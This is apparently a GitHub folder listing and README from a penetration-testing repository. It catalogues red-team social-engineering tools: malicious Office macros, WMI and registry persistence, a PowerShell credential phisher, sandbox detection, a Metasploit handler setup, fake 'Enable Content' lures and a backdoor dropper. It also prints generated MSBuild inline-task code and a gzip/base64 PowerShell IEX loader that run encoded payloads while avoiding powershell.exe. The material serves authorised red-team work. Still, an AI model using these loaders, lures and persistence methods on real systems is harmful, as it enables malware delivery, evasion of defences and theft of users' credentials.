mgeeky-Penetration-Testing-.../social-engineering
2018-02-02 22:22:43 +01:00
..
warnings First 2018-02-02 22:22:43 +01:00
backdoor-drop.js First 2018-02-02 22:22:43 +01:00
compressedPowershell.py First 2018-02-02 22:22:43 +01:00
delete-warning-div-macro.vbs First 2018-02-02 22:22:43 +01:00
generateMSBuildPowershellXML.py First 2018-02-02 22:22:43 +01:00
Invoke-Command-Cred-Example.ps1 First 2018-02-02 22:22:43 +01:00
Macro-Less-Cheatsheet.md First 2018-02-02 22:22:43 +01:00
macro-psh-stdin-author.vbs First 2018-02-02 22:22:43 +01:00
MacroDetectSandbox.vbs First 2018-02-02 22:22:43 +01:00
msbuild-powershell-msgbox.xml First 2018-02-02 22:22:43 +01:00
muti-stage-1.md First 2018-02-02 22:22:43 +01:00
Phish-Creds.ps1 First 2018-02-02 22:22:43 +01:00
README.md First 2018-02-02 22:22:43 +01:00
set-handler.rc First 2018-02-02 22:22:43 +01:00
SubstitutePageMacro.vbs First 2018-02-02 22:22:43 +01:00
Various-Macro-Based-RCEs.md First 2018-02-02 22:22:43 +01:00
vba-macro-mac-persistence.vbs First 2018-02-02 22:22:43 +01:00
vba-windows-persistence.vbs First 2018-02-02 22:22:43 +01:00
WMIPersistence.vbs First 2018-02-02 22:22:43 +01:00

  • Macro-Less-Cheatsheet.md - Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet (gist)

  • generateMSBuildPowershellXML.py - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using powershell.exe (gist)

    Example output not minimized:

C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1

    :: Powershell via MSBuild inline-task XML payload generation script
    To be used during Red-Team assignments to launch Powershell payloads without     using 'powershell.exe'
    Mariusz B. / mgeeky, <mb@binary-offensive.com>

[?] File not recognized as PE/EXE.


public class hwiJYmWvD : Task { public override bool Execute() { byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZ WN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn SDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW0 1U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZV czNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0T Xo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3 LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5 HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb 2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs="); string decoded = System.Text.Encoding.UTF8.GetString(payload); Runspace runspace = RunspaceFactory.CreateRunspace(); runspace.Open(); Pipeline pipeline = runspace.CreatePipeline(); pipeline.Commands.AddScript(decoded); pipeline.Invoke(); runspace.Close(); return true; } } ]]> </Code> </Task> ------------------------------------------------------------------------------------ ```
**minimized**

```

C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 -m

    :: Powershell via MSBuild inline-task XML payload generation     script                                       
    To be used during Red-Team assignments to launch Powershell payloads without     using 'powershell.exe'       
    Mariusz B. / mgeeky, <mb@binary-offensive.com>                                                                

[?] File not recognized as PE/EXE.


< Code Type="Class" Language="cs"></Usi ngTask>

```
  • msbuild-powershell-msgbox.xml - Example of Powershell execution via MSBuild inline task XML file. On a simple Message-Box script. (gist)

  • compressedPowershell.py - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) . (gist)

    Example:

$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA==')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); ```

  • muti-stage-1.md - Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process. (gist)

  • macro-psh-stdin-author.vbs - VBS Social Engineering Macro with Powershell invocation taking arguments from Author property and feeding them to StdIn. (gist)

  • Invoke-Command-Cred-Example.ps1 - Example of using PSRemoting with credentials passed directly from command line. (gist)

  • Phish-Creds.ps1 - Powershell oneline Credentials Phisher - to be used in malicious Word Macros/VBA/HTA or other RCE commands on seized machine. (gist)

    One can additionally add, right after Get-Credential following parameters that could improve pretext's quality during social engineering attempt:

    • -Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog
    • -Message "Some luring sentence" - to include some luring message
  • vba-windows-persistence.vbs - VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run. (gist)

  • set-handler.rc - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. (gist)

  • delete-warning-div-macro.vbs - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. (gist)

  • vba-macro-mac-persistence.vbs - (WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros. (gist)

  • WMIPersistence.vbs - Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up. (gist)

  • MacroDetectSandbox.vbs - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. (gist)

  • Various-Macro-Based-RCEs.md - Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine. (gist)

  • SubstitutePageMacro.vbs - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named RealDoc (configured via variable autoTextTemplateName ). (gist)

  • warnings\EN-Word.docx and warnings\EN-Excel.docx - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons.

  • backdoor-drop.js - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. (gist)